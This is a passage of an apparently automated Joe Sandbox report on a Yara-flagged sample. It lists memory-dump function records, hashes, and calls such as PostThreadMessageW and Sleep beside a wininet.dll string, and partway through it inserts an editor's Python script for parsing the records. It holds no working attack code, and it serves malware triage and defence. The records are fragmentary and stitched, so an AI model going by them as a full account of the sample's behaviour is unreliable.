                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 00fc0c8714c28f41c69c8afc5a7a613656caee28af8ae0f0c6b623448059de90
                                                                                  • Instruction ID: d2314a58ad9cac7509259bd10e5f0c7ba189605dae8435e54b82dc29f46f30cf
                                                                                  • Opcode Fuzzy Hash: 00fc0c8714c28f41c69c8afc5a7a613656caee28af8ae0f0c6b623448059de90
                                                                                  • Instruction Fuzzy Hash: 1890026160140512D10171588408627001AC7D02C1F95C026A6024555ECA268A96A131
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 5a84e06a6b95ce20b48ae13393e05308d9dbe2ad1c8d1868d5bf5035ed47674d
                                                                                  • Instruction ID: 7871af7120aed2198d8362311d5d7750803c14f2102dfe6d68af1b15941a14c4
                                                                                  • Opcode Fuzzy Hash: 5a84e06a6b95ce20b48ae13393e05308d9dbe2ad1c8d1868d5bf5035ed47674d
                                                                                  • Instruction Fuzzy Hash: 1F900261211C0052D20075688C18B170015C7D0383F55C119A5154554CC91689655521
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: ae7a3bf17b049e7669c2ad5acc63d1e06f8f952a515e713b8efca1c063f5f2cd
                                                                                  • Instruction ID: 1c4062bd518a3475ddb63f8d394ff504e74e2cac73053e4b5ba2c160aa1b9cf6
                                                                                  • Opcode Fuzzy Hash: ae7a3bf17b049e7669c2ad5acc63d1e06f8f952a515e713b8efca1c063f5f2cd
                                                                                  • Instruction Fuzzy Hash: E49002616014005241407168C8489174015EBE1291755C125A5998550D855A89695665
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 4d683354123d4d9525d22a9b37852d021bd0b0271c07b772e0eb06fd36213716
                                                                                  • Instruction ID: 17f2daef2404eb9418128504c42eaab271fc60962944ea59d058feb4d1875410
                                                                                  • Opcode Fuzzy Hash: 4d683354123d4d9525d22a9b37852d021bd0b0271c07b772e0eb06fd36213716
                                                                                  • Instruction Fuzzy Hash: EB9002A134140452D10071588418B170015C7E1381F55C019E6064554D861ACD566126
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 76d3ccb86599757541a390ee8cd277f961292a48bb826774922335713879f99b
                                                                                  • Instruction ID: 8421f33f877c92231958ca8f8683003d0eeb83b032a886136bbe4de2745051d1
                                                                                  • Opcode Fuzzy Hash: 76d3ccb86599757541a390ee8cd277f961292a48bb826774922335713879f99b
                                                                                  • Instruction Fuzzy Hash: 2F90027120140412D1007598940C6570015C7E0381F55D015AA024555EC66689956131
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 65018cc7bf26631e2d7d116d622047983cc59627f844b8c263e375893e395278
                                                                                  • Instruction ID: 9c129e3d85f65b65fa391d44a3871bf91c88495263d119b8aa3c5ca20e47609e
                                                                                  • Opcode Fuzzy Hash: 65018cc7bf26631e2d7d116d622047983cc59627f844b8c263e375893e395278
                                                                                  • Instruction Fuzzy Hash: F590027120148812D1107158C40875B0015C7D0381F59C415A9424658D869689957121
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 8f2595d08a3223cc164e93f57da595dc0c5d5793f6ac4a91a81c3786c3133c8c
                                                                                  • Instruction ID: acaae6db2da403c1e81e37ec00a15c72a62e9c881751211d3641264d7ba62c56
                                                                                  • Opcode Fuzzy Hash: 8f2595d08a3223cc164e93f57da595dc0c5d5793f6ac4a91a81c3786c3133c8c
                                                                                  • Instruction Fuzzy Hash: 2D90027120140852D10071588408B570015C7E0381F55C01AA5124654D8616C9557521
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 577801e3011b5d3fac556d927851d2b00a1012a1fe58965e19ed6e1bacc2fb2f
                                                                                  • Instruction ID: 39558fc426485b5565a94b021d344ff492192d646055543e093fd7182b86f069
                                                                                  • Opcode Fuzzy Hash: 577801e3011b5d3fac556d927851d2b00a1012a1fe58965e19ed6e1bacc2fb2f
                                                                                  • Instruction Fuzzy Hash: 3190027120140423D111715885087170019C7D02C1F95C416A5424558D96578A56A121
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 0524a7b57e32530b5ae53d74c633eea137bfa368f46802b485188d2c2c8f75c7
                                                                                  • Instruction ID: fbd9fb9a67eff717a572840efb762a46119cbad8cc9e67c7cf4abb594d2e2e51
                                                                                  • Opcode Fuzzy Hash: 0524a7b57e32530b5ae53d74c633eea137bfa368f46802b485188d2c2c8f75c7
                                                                                  • Instruction Fuzzy Hash: F2900261242441625545B15884085174016D7E02C1795C016A6414950C8527995AD621
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: d9bc3e9d8f36fa06742cb7895451e3207e2d1d98f96e85bf6a8ddf1b0cdb7361
                                                                                  • Instruction ID: 11cfc40db8c3f365a32ca68d748a5bd454f28d296ea1a24a8e4371d0847b5671
                                                                                  • Opcode Fuzzy Hash: d9bc3e9d8f36fa06742cb7895451e3207e2d1d98f96e85bf6a8ddf1b0cdb7361
                                                                                  • Instruction Fuzzy Hash: A990047130140013D140715CD41C7174015D7F13C1F55D015F5414554CDD17CD5F5333
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 1669be1f1cf2bf50b22a71ea46eb3b62669b63e3abb6cd7b59ab893d7810dd8b
                                                                                  • Instruction ID: 96308e0ac40de5f86d689363c3d995bf5989ffa7ee85d3cb1980ba4f6b8da76a
                                                                                  • Opcode Fuzzy Hash: 1669be1f1cf2bf50b22a71ea46eb3b62669b63e3abb6cd7b59ab893d7810dd8b
                                                                                  • Instruction Fuzzy Hash: 8690026921340012D1807158940C61B0015C7D1282F95D419A5015558CC916896D5321
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 0042f55688dfffcf431ac64d41c3d126fa53c34ca7d486da1877a716f6e229e5
                                                                                  • Instruction ID: 90da9614664562e0fdcdd7217199530707dfbbd8c8d93cd50c991b635d5c7b37
                                                                                  • Opcode Fuzzy Hash: 0042f55688dfffcf431ac64d41c3d126fa53c34ca7d486da1877a716f6e229e5
                                                                                  • Instruction Fuzzy Hash: 8D90027160550412D100715885187171015C7D0281F65C415A5424568D87968A5565A2
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 5b8d1bc2bb6f9fc972a14b83de10a8462844183e3bfc9902ec64e086c5eb8d61
                                                                                  • Instruction ID: 703f796adefde469630e8ee17b7b50a2cb1dbb01344348471de833ab7be89e05
                                                                                  • Opcode Fuzzy Hash: 5b8d1bc2bb6f9fc972a14b83de10a8462844183e3bfc9902ec64e086c5eb8d61
                                                                                  • Instruction Fuzzy Hash: ED90026124545112D150715C84086274015E7E0281F55C025A5814594D855689596221

                                                                                  Control-flow Graph (basic blocks by address range; "->" lists successor blocks)
                                                                                  • 382: 6d0ef7-6d0f09 -> 383, 384
                                                                                  • 383: 6d0f4b-6d0f54
                                                                                  • 384: 6d0f0b-6d0f1d -> 385, 386
                                                                                  • 385: 6d0f1f-6d0f26 -> 389
                                                                                  • 386: 6d0f76-6d0f7f -> 387, 388
                                                                                  • 387: 6d0f85-6d0fca (call 6d4730, call 6c13e0, call 6e1e60) -> 397, 398
                                                                                  • 388: 6d0f80 (call 6ec1a0) -> 387
                                                                                  • 389: 6d0f27-6d0f43 -> 383
                                                                                  • 397: 6d0fcc-6d0fdb (PostThreadMessageW) -> 398, 399
                                                                                  • 398: 6d0fea-6d0ff0
                                                                                  • 399: 6d0fdd-6d0fe7 -> 398
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 006D0FD7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: e151968$e151968
                                                                                  • API String ID: 1836367815-1714165782
                                                                                  • Opcode ID: dff3c99ebe8f82e78cd61e7552ec5033fbfb9b47d96495e17cfd6294eb1bd34a
                                                                                  • Instruction ID: 1470a9ec1bd6041f0189324cc9388d38049c56dfcb922f3a4396d98b39bbf9de
                                                                                  • Opcode Fuzzy Hash: dff3c99ebe8f82e78cd61e7552ec5033fbfb9b47d96495e17cfd6294eb1bd34a
                                                                                  • Instruction Fuzzy Hash: 2221CEB29092597B9B1157B81C819FEBB6DDF42370F1482AFEC94DB382D2254D0383D1

                                                                                  Control-flow Graph (basic blocks by address range; "->" lists successor blocks)
                                                                                  • 400: 6d0f5d-6d0fca (call 6eb790, call 6ec1a0, call 6d4730, call 6c13e0, call 6e1e60) -> 413, 414
                                                                                  • 413: 6d0fcc-6d0fdb (PostThreadMessageW) -> 414, 415
                                                                                  • 414: 6d0fea-6d0ff0
                                                                                  • 415: 6d0fdd-6d0fe7 -> 414
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 006D0FD7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: e151968$e151968
                                                                                  • API String ID: 1836367815-1714165782
                                                                                  • Opcode ID: 1f2d35f3733551a780787f5eda6c898a51f723e0808061f033a263329ac30ce1
                                                                                  • Instruction ID: 153c83d887617fc0ddcd55be2de0db61283f651898437ed4f6c0691264e01836
                                                                                  • Opcode Fuzzy Hash: 1f2d35f3733551a780787f5eda6c898a51f723e0808061f033a263329ac30ce1
                                                                                  • Instruction Fuzzy Hash: F301C8B2D4125C7AEB11AAE54C82DEF7B7DDF41794F048069F904A7241D6349E0647A1

                                                                                  Control-flow Graph (basic blocks by address range; "->" lists successor blocks)
                                                                                  • 416: 6d0f60-6d0fca (call 6eb790, call 6ec1a0, call 6d4730, call 6c13e0, call 6e1e60) -> 428, 429
                                                                                  • 428: 6d0fcc-6d0fdb (PostThreadMessageW) -> 429, 430
                                                                                  • 429: 6d0fea-6d0ff0
                                                                                  • 430: 6d0fdd-6d0fe7 -> 429
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 006D0FD7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: e151968$e151968
                                                                                  • API String ID: 1836367815-1714165782
                                                                                  • Opcode ID: bb05a244c4477c3993dd5ddde349af8bd930d90ac3fdf40f86e1ebf393e129e9
                                                                                  • Instruction ID: 4870b773332b0ea253c0d921a368e40687ca8b0a40511b5103ac42dc5f0ba7ed
                                                                                  • Opcode Fuzzy Hash: bb05a244c4477c3993dd5ddde349af8bd930d90ac3fdf40f86e1ebf393e129e9
                                                                                  • Instruction Fuzzy Hash: D901D6B2D0125C7BEB10ABE58C82DEF7B7CEF41794F008069FA04A7241D6345E0687B1

                                                                                  Control-flow Graph (basic blocks by address range; "->" lists successor blocks)
                                                                                  • 431: 6d0ee4-6d0fca (call 6eb790, call 6ec1a0, call 6d4730, call 6c13e0, call 6e1e60) -> 443, 444
                                                                                  • 443: 6d0fcc-6d0fdb (PostThreadMessageW) -> 444, 445
                                                                                  • 444: 6d0fea-6d0ff0
                                                                                  • 445: 6d0fdd-6d0fe7 -> 444
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 006D0FD7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: e151968$e151968
                                                                                  • API String ID: 1836367815-1714165782
                                                                                  • Opcode ID: 64a15e6c45a799872822cf0dcf7ac46a933c628447448f938c7dc3c06b919add
                                                                                  • Instruction ID: d8980ff5554ceb501ac53cfe7789d823131068de91a4b43dc79fc9e3758945ed
                                                                                  • Opcode Fuzzy Hash: 64a15e6c45a799872822cf0dcf7ac46a933c628447448f938c7dc3c06b919add
                                                                                  • Instruction Fuzzy Hash: 54012672D0135C7ADF109BE44C82EEF7B6DDF81754F048199F914A7240D6385E068BA1
                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(000007D0), ref: 006E3D7B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID: net.dll$wininet.dll
                                                                                  • API String ID: 3472027048-1269752229
                                                                                  • Opcode ID: 1fdc08a6907c13953fe09c2ee08094e52864dfca08c083a11694c04097a914f1
                                                                                  • Instruction ID: 821b934e9fe0590614fb46754f16a74928958486d30d95730c4f395f1f5cb91d
                                                                                  • Opcode Fuzzy Hash: 1fdc08a6907c13953fe09c2ee08094e52864dfca08c083a11694c04097a914f1
                                                                                  • Instruction Fuzzy Hash: 31318DB1601305BBD714DFA5CC84FEBB7BAAF84700F14451DBA196B280D770AA408BA4
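The four MessagePostThread records above all resolve to the same call site (ref 006D0FD7) from different function starts (6d0ee4, 6d0ef7, 6d0f5d, 6d0f60), and the Sleep record carries the wininet.dll string next to a 0x7D0 argument. Reading those facts out of a report this long by hand is error-prone, so the following triage script is added here as an editor's example; it is not Joe Sandbox code and not part of the original report. It parses the report's own record layout ("APIs" lines, the "Memory Dump Source" offset, and the "Similarity" IDs), decodes the two argument values worth decoding (the Sleep interval in milliseconds and the PostThreadMessageW message number, where 0x0111 is WM_COMMAND), and groups records that share a call site. The embedded SAMPLE is a constructed, shortened copy of three of the records on this page; the WM_COMMAND annotation and the "overlapping function starts" interpretation are the editor's, not the report's.

```python
"""Triage helper for Joe Sandbox function-similarity records (added example).

Each function record in the report repeats one layout: an "APIs" block with
resolved calls, a "Memory Dump Source" block naming the dump region, and a
"Similarity" block with API/String/Opcode IDs.  This script parses that text,
decodes the argument values that matter for triage, and groups records that
resolve to the same call site.
"""
import re
from collections import defaultdict

# Constructed excerpt in the report's own layout (three of the page's records,
# shortened to the fields used below); not the full report.
SAMPLE = """\
APIs
• PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 006D0FD7
Strings
Memory Dump Source
• Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
Similarity
• API ID: MessagePostThread
• String ID: e151968$e151968
• API String ID: 1836367815-1714165782
• Opcode ID: dff3c99ebe8f82e78cd61e7552ec5033fbfb9b47d96495e17cfd6294eb1bd34a
APIs
• PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 006D0FD7
Strings
Memory Dump Source
• Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
Similarity
• API ID: MessagePostThread
• String ID: e151968$e151968
• API String ID: 1836367815-1714165782
• Opcode ID: 1f2d35f3733551a780787f5eda6c898a51f723e0808061f033a263329ac30ce1
APIs
• Sleep.KERNELBASE(000007D0), ref: 006E3D7B
Strings
Memory Dump Source
• Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
• Opcode ID: 1fdc08a6907c13953fe09c2ee08094e52864dfca08c083a11694c04097a914f1
"""

CALL_RE = re.compile(
    r"^(?P<func>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$"
)
FIELD_RE = re.compile(r"^(?P<key>[A-Za-z ]+): ?(?P<val>.*)$")
RECORD_START = {"APIs", "Control-flow Graph"}
# Window-message constants decoded here; 0x0111 (WM_COMMAND) is the only value in this report.
WINDOW_MESSAGES = {0x0111: "WM_COMMAND"}


def parse_records(text):
    """Split report text into per-function dicts holding API calls and key/value fields."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line in RECORD_START:          # a new function record begins here
            if cur is not None:
                records.append(cur)
            cur = {"calls": [], "fields": {}}
            continue
        if cur is None:
            continue
        m = CALL_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur["calls"].append({"func": m["func"], "module": m["module"],
                                 "args": args, "ref": m["ref"].upper()})
            continue
        m = FIELD_RE.match(line)
        if m:                             # "API ID: ...", "Opcode ID: ...", "Source File: ..."
            cur["fields"][m["key"]] = m["val"]
    if cur is not None:
        records.append(cur)
    return records


def region(record):
    """Load address of the dump region the record was carved from, e.g. '006C0000'."""
    m = re.search(r"Offset: ([0-9A-Fa-f]+)", record["fields"].get("Source File", ""))
    return m.group(1).upper() if m else None


def strings(record):
    """The '$'-joined String ID split into individual strings."""
    return [s for s in record["fields"].get("String ID", "").split("$") if s]


def decode_call(call):
    """Human-readable notes for the argument values that matter for triage."""
    func, args = call["func"], call["args"]
    notes = []
    if func == "Sleep" and args and args[0] != "?":
        notes.append(f"{int(args[0], 16)} ms")
    if func == "PostThreadMessageW" and len(args) >= 2 and args[1] != "?":
        msg = int(args[1], 16)
        notes.append(WINDOW_MESSAGES.get(msg, f"msg 0x{msg:04X}"))
        notes.append(f"target thread id 0x{args[0]}")
    return notes


def overlapping_functions(records):
    """Call sites reached by more than one record: (func, ref) -> sorted Opcode ID prefixes.

    Several records sharing one ref address means the plugin emitted several
    entry points into the same code; worth knowing before counting "functions".
    """
    sites = defaultdict(set)
    for r in records:
        opcode = r["fields"].get("Opcode ID", "?")[:12]
        for c in r["calls"]:
            sites[(c["func"], c["ref"])].add(opcode)
    return {k: sorted(v) for k, v in sites.items() if len(v) > 1}


def main():
    recs = parse_records(SAMPLE)
    for r in recs:
        print(f"[{region(r)}] API ID={r['fields'].get('API ID')} strings={strings(r)}")
        for c in r["calls"]:
            print(f"   {c['func']} @ {c['ref']}  {', '.join(decode_call(c))}")
    for (func, ref), ids in overlapping_functions(recs).items():
        print(f"overlap: {func} @ {ref} reached from {len(ids)} records: {ids}")


if __name__ == "__main__":
    main()
```

Feed the whole exported report text to `parse_records` instead of SAMPLE to get the full picture; records that begin with a "Control-flow Graph" block are recognised as well, and the graph line itself is ignored.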
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6c0000_find.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InitializeUninitialize
                                                                                  • String ID: @J7<
                                                                                  • API String ID: 3442037557-2016760708
                                                                                  • Opcode ID: 062367b77982b2c9d353431175b0f1d93a89966c546ccafbd6c71e67538da020
                                                                                  • Instruction ID: 78c0315b243caa159b0497d72c355517252015026fa12d53107a2d264969ed2d
                                                                                  • Opcode Fuzzy Hash: 062367b77982b2c9d353431175b0f1d93a89966c546ccafbd6c71e67538da020
                                                                                  • Instruction Fuzzy Hash: C03130B5A0020A9FDB00DF98D8809EFB7BABF88304B108559E516EB354D771EE05CBA0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
